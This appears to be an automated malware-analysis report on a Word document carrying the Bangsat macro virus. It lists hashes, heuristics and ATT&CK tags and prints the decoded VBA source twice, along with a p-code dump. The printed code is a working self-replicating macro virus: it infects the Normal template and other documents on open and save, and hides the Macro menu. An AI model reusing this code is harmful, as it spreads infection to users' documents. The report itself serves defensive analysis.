Bangsat Office (OLE) malware analysis — malicious · b640e4564eb66a85

MALICIOUS

Office (OLE)

60.0 KB Created: 2004-12-21 02:24:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 45d1d2963e0aa02152de9c0a7ba2dd41 SHA-1: 91e03b4a01ebbb5fb4f3ec49b6fb72c06332b4bd SHA-256: b640e4564eb66a85fe99e47bb64ce2615bea4065cceb42b2e15e5c15c537bec9

80 Risk Score

Malware Insights

Bangsat · confidence 90%

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a Microsoft Word document containing VBA macros. The presence of 'AutoOpen' and 'AutoExec' macros, along with the 'Bangsat' module name, strongly suggests the Bangsat malware family. The macros are designed to execute automatically when the document is opened, likely to download and execute a secondary payload or establish persistence.

Heuristics 3

VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 7724 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	7724 bytes
SHA-256: `c0e22781cac433ac54361bf0fe8d228a95717970f880626df9ee9be45f5e8c80`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = True Attribute VB_Name = "Bangsat" ' Bangsat ' version 1.0a ' release 1 ' dated October 01, 2001 ' origin PMKN, Malaysia ' created by (iB@, Evbat, ali) all are same person, different identity ' from the MVS Studio ' message -> Thanks for being something in my life... ' and to whom did assemble this macro, There You'll Be, I Know! ' drop me a line at macam_jarum@yahoo.com Sub AutoExec() Application.StatusBar = "Bangsat betul si Liman tu yer...!!!" BangsatSembunyi End Sub Sub AutoOpen() Application.StatusBar = "Bangsat betul si Liman tu yer...!!!" SangatBangsat End Sub Function SangatBangsat() On Error Resume Next Dim MulaBangsat As String If MacroContainer = NormalTemplate Then For i = 1 To ActiveDocument.VBProject.VBComponents.Count If NormalTemplate.VBProject.VBComponents.Item(i).CodeModule = "Bangsat" Then GoTo DahKenaBangsat Else MulaBangsat = NormalTemplate.VBProject.VBComponents.Item("Bangsat").CodeModule.Lines(1, NormalTemplate.VBProject.VBComponents.Item("Bangsat").CodeModule.CountOfLines) ActiveDocument.VBProject.VBComponents.Add vbext_ct_StdModule ActiveDocument.VBProject.VBComponents.Item("Module1").CodeModule.AddFromString MulaBangsat ActiveDocument.VBProject.VBComponents.Item("Module1").Name = "Bangsat" BangsatMenggatal ActiveDocument.Save End If Next i Else MulaBangsat = ActiveDocument.VBProject.VBComponents.Item("Bangsat").CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents.Item("Bangsat").CodeModule.CountOfLines) Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "Bangsat", 3 NormalTemplate.Save End If DahKenaBangsat: End Function Sub FileOpen() On Error Resume Next Dialogs(wdDialogFileOpen).Show SangatBangsat Application.StatusBar = "Bangsat betul si Liman tu yer...!!!" End Sub Function BangsatSembunyi() On Error Resume Next CommandBars("Tools").Controls("Macro").Enabled = False End Function Function BangsatMenggatal() With Dialogs(wdDialogFileSummaryInfo) .Comments = "Bangsat untuk kita menyukai orang, kemudian membencinya pula...macam_jarum@yahoo.com" .Execute End With End Function Sub FileSaveAs() On Error Resume Next Dialogs(wdDialogFileSaveAs).Show SangatBangsat End Sub ' Processing file: /opt/analyzer/scan_staging/c3e0ffef80444cbe8d44922d6c9ddc4d.bin ' =============================================================================== ' Module streams: ' Macros/VBA/ThisDocument - 9414 bytes ' Macros/VBA/Bangsat - 9992 bytes ' Line #0: ' QuoteRem 0x0000 0x0008 " Bangsat" ' Line #1: ' QuoteRem 0x0000 0x000D " version 1.0a" ' Line #2: ' QuoteRem 0x0000 0x000A " release 1" ' Line #3: ' QuoteRem 0x0000 0x0017 " dated October 01, 2001" ' Line #4: ' QuoteRem 0x0000 0x0016 " origin PMKN, Malaysia" ' Line #5: ' QuoteRem 0x0000 0x0045 " created by (iB@, Evbat, ali) all are same person, different identity" ' Line #6: ' QuoteRem 0x0000 0x0014 " from the MVS Studio" ' Line #7: ' QuoteRem 0x0000 0x0034 " message -> Thanks for being something in my life..." ' Line #8: ' QuoteRem 0x0000 0x003E " and to whom did assemble this macro, There You'll Be, I Know!" ' Line #9: ' QuoteRem 0x0000 0x0028 " drop me a line at macam_jarum@yahoo.com" ' Line #10: ' Line #11: ' FuncDefn (Sub AutoExec()) ' Line #12: ' LitStr 0x0023 "Bangsat betul si Liman tu yer...!!!" ' Ld Application ' MemSt StatusBar ' Line #13: ' ArgsCall BangsatSembunyi 0x0000 ' Line #14: ' EndSub ' Line #15: ' Line #16: ' FuncDefn (Sub AutoOpen()) ' Line #17: ' LitStr 0x0023 "Bangsat betul si Liman tu yer...!!!" ' Ld Application ' MemSt StatusBar ' Line #18: ' ArgsCall SangatBangsat 0x0000 ' Line #19: ' EndSub ' Line #20: ' Line #21: ' FuncDefn (Function SangatBangsat()) ' Line #22: ' OnError (Resume Next) ' Line #23: ' Dim ' VarDefn MulaBangsat (As String) ... (truncated)

SHA-256: c0e22781cac433ac54361bf0fe8d228a95717970f880626df9ee9be45f5e8c80

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Bangsat"
' Bangsat
' version 1.0a
' release 1
' dated October 01, 2001
' origin PMKN, Malaysia
' created by (iB@, Evbat, ali) all are same person, different identity
' from the MVS Studio
' message -> Thanks for being something in my life...
' and to whom did assemble this macro, There You'll Be, I Know!
' drop me a line at macam_jarum@yahoo.com

Sub AutoExec()
Application.StatusBar = "Bangsat betul si Liman tu yer...!!!"
BangsatSembunyi
End Sub

Sub AutoOpen()
Application.StatusBar = "Bangsat betul si Liman tu yer...!!!"
SangatBangsat
End Sub

Function SangatBangsat()
On Error Resume Next
Dim MulaBangsat As String
If MacroContainer = NormalTemplate Then
For i = 1 To ActiveDocument.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents.Item(i).CodeModule = "Bangsat" Then
GoTo DahKenaBangsat
Else
MulaBangsat = NormalTemplate.VBProject.VBComponents.Item("Bangsat").CodeModule.Lines(1, NormalTemplate.VBProject.VBComponents.Item("Bangsat").CodeModule.CountOfLines)
ActiveDocument.VBProject.VBComponents.Add vbext_ct_StdModule
ActiveDocument.VBProject.VBComponents.Item("Module1").CodeModule.AddFromString MulaBangsat
ActiveDocument.VBProject.VBComponents.Item("Module1").Name = "Bangsat"
BangsatMenggatal
ActiveDocument.Save
End If
Next i
Else
MulaBangsat = ActiveDocument.VBProject.VBComponents.Item("Bangsat").CodeModule.Lines(1, ActiveDocument.VBProject.VBComponents.Item("Bangsat").CodeModule.CountOfLines)
Application.OrganizerCopy ActiveDocument.FullName, NormalTemplate.FullName, "Bangsat", 3
NormalTemplate.Save
End If
DahKenaBangsat:
End Function

Sub FileOpen()
On Error Resume Next
Dialogs(wdDialogFileOpen).Show
SangatBangsat
Application.StatusBar = "Bangsat betul si Liman tu yer...!!!"
End Sub

Function BangsatSembunyi()
On Error Resume Next
CommandBars("Tools").Controls("Macro").Enabled = False
End Function

Function BangsatMenggatal()
With Dialogs(wdDialogFileSummaryInfo)
    .Comments = "Bangsat untuk kita menyukai orang, kemudian membencinya pula...macam_jarum@yahoo.com"
    .Execute
End With
End Function

Sub FileSaveAs()
On Error Resume Next
Dialogs(wdDialogFileSaveAs).Show
SangatBangsat
End Sub

' Processing file: /opt/analyzer/scan_staging/c3e0ffef80444cbe8d44922d6c9ddc4d.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 9414 bytes
' Macros/VBA/Bangsat - 9992 bytes
' Line #0:
' 	QuoteRem 0x0000 0x0008 " Bangsat"
' Line #1:
' 	QuoteRem 0x0000 0x000D " version 1.0a"
' Line #2:
' 	QuoteRem 0x0000 0x000A " release 1"
' Line #3:
' 	QuoteRem 0x0000 0x0017 " dated October 01, 2001"
' Line #4:
' 	QuoteRem 0x0000 0x0016 " origin PMKN, Malaysia"
' Line #5:
' 	QuoteRem 0x0000 0x0045 " created by (iB@, Evbat, ali) all are same person, different identity"
' Line #6:
' 	QuoteRem 0x0000 0x0014 " from the MVS Studio"
' Line #7:
' 	QuoteRem 0x0000 0x0034 " message -> Thanks for being something in my life..."
' Line #8:
' 	QuoteRem 0x0000 0x003E " and to whom did assemble this macro, There You'll Be, I Know!"
' Line #9:
' 	QuoteRem 0x0000 0x0028 " drop me a line at macam_jarum@yahoo.com"
' Line #10:
' Line #11:
' 	FuncDefn (Sub AutoExec())
' Line #12:
' 	LitStr 0x0023 "Bangsat betul si Liman tu yer...!!!"
' 	Ld Application 
' 	MemSt StatusBar 
' Line #13:
' 	ArgsCall BangsatSembunyi 0x0000 
' Line #14:
' 	EndSub 
' Line #15:
' Line #16:
' 	FuncDefn (Sub AutoOpen())
' Line #17:
' 	LitStr 0x0023 "Bangsat betul si Liman tu yer...!!!"
' 	Ld Application 
' 	MemSt StatusBar 
' Line #18:
' 	ArgsCall SangatBangsat 0x0000 
' Line #19:
' 	EndSub 
' Line #20:
' Line #21:
' 	FuncDefn (Function SangatBangsat())
' Line #22:
' 	OnError (Resume Next) 
' Line #23:
' 	Dim 
' 	VarDefn MulaBangsat (As String)
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.